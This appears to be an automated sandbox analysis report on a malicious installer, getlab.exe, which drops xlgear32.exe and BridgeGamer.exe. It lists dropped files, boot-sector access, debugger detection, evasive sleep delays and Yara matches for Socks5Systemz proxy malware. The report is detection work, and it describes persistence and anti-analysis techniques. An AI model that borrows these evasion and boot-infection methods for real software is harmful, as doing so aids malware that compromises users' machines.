                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0040993C push 00409979h; ret 1_2_00409971
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0040A037 push ds; ret 1_2_0040A038
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004941B8 push ecx; mov dword ptr [esp], ecx1_2_004941BD
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004106C8 push ecx; mov dword ptr [esp], edx1_2_004106CD
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00412920 push 00412983h; ret 1_2_0041297B
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00484BE8 push ecx; mov dword ptr [esp], ecx1_2_00484BED
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0040D020 push ecx; mov dword ptr [esp], edx1_2_0040D022
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004590F0 push 00459134h; ret 1_2_0045912C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00443438 push ecx; mov dword ptr [esp], ecx1_2_0044343C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00483544 push 00483633h; ret 1_2_0048362B
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0040F580 push ecx; mov dword ptr [esp], edx1_2_0040F582
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0047759C push ecx; mov dword ptr [esp], edx1_2_0047759D
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004517CC push 004517FFh; ret 1_2_004517F7
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00451990 push ecx; mov dword ptr [esp], eax1_2_00451995
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0045FB44 push ecx; mov dword ptr [esp], ecx1_2_0045FB48
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00419C20 push ecx; mov dword ptr [esp], ecx1_2_00419C25
                    Source: xlgear32.exe.1.drStatic PE information: section name: .stum8 entropy: 7.739050032528007
                    Source: BridgeGamer.exe.4.drStatic PE information: section name: .stum8 entropy: 7.739050032528007

                    Persistence and Installation Behavior

                    barindex
                    Contains functionality to infect the boot sector
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A4F
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_02D9F8A3
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-NVVDJ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-Q00OL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-GH467.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-K4GKL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\getlab.exeFile created: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\is-UJ38T.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-VVRBT.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-B16F3.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeFile created: C:\ProgramData\BridgeGamer\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeFile created: C:\ProgramData\BridgeGamer\BridgeGamer.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-4GRQU.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\bjpeg23.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeFile created: C:\ProgramData\BridgeGamer\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeFile created: C:\ProgramData\BridgeGamer\BridgeGamer.exeJump to dropped file

                    Boot Survival

                    barindex
                    Contains functionality to infect the boot sector
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A4F
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_02D9F8A3
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_00402253 StartServiceCtrlDispatcherA,4_2_00402253
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C04
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C04
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004241D4 IsIconic,SetActiveWindow,SetFocus,1_2_004241D4
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0042418C IsIconic,SetActiveWindow,1_2_0042418C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0041837C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_0041837C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00422854 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_00422854
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00482EF8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00482EF8
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00417590 IsIconic,GetCapture,1_2_00417590
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00417CC6 IsIconic,SetWindowPos,1_2_00417CC6
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00417CC8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CC8
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0041F110 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F110
                    Source: C:\Users\user\Desktop\getlab.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60920C91 rdtsc 4_2_60920C91
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_00401B4B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_02D9F9A7
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeWindow / User API: threadDelayed 6214Jump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeWindow / User API: threadDelayed 3693Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-NVVDJ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-Q00OL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-GH467.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-K4GKL.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-48NRD.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\uninstall\is-UJ38T.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-VVRBT.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-B16F3.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\bjpeg23.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-4GRQU.tmpJump to dropped file
                    Source: C:\Users\user\Desktop\getlab.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5687
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-60994
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeAPI coverage: 5.7 %
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 1440Thread sleep count: 6214 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 1440Thread sleep time: -12428000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 5800Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 5800Thread sleep time: -2040000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 1440Thread sleep count: 3693 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe TID: 1440Thread sleep time: -7386000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00452A34 FindFirstFileA,GetLastError,1_2_00452A34
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,1_2_00474D70
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00462578 FindFirstFileA,FindNextFileA,FindClose,1_2_00462578
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004975B0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B04
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463F80
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeThread delayed: delay time: 60000Jump to behavior
                    Source: xlgear32.exe, 00000004.00000002.2936299565.0000000000818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: xlgear32.exe, 00000004.00000002.2936299565.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\getlab.exeAPI call chain: ExitProcess graph end nodegraph_0-6727
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeAPI call chain: ExitProcess graph end nodegraph_4-60761
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Found API chain indicative of debugger detection
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_4-60889
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60920C91 rdtsc 4_2_60920C91
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DB01BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_02DB01BE
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DB01BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_02DB01BE
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00450294 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450294
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02D9648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,4_2_02D9648B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DA9528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_02DA9528
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00477F98 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00477F98
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause xl_gear_11293Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0042E094 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E094
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02D9F85B cpuid 4_2_02D9F85B
                    Source: C:\Users\user\Desktop\getlab.exeCode function: GetLocaleInfoA,0_2_004051FC
                    Source: C:\Users\user\Desktop\getlab.exeCode function: GetLocaleInfoA,0_2_00405248
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: GetLocaleInfoA,1_2_00408558
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: GetLocaleInfoA,1_2_004085A4
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004583E8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004583E8
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00455570 GetUserNameA,1_2_00455570
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Socks5Systemz
                    Source: Yara matchFile source: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2937019748.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xlgear32.exe PID: 3320, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Socks5Systemz
                    Source: Yara matchFile source: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2937019748.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xlgear32.exe PID: 3320, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,4_2_609660FA
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,4_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,4_2_60963143
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,4_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,4_2_6096923E
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,4_2_6096A38C
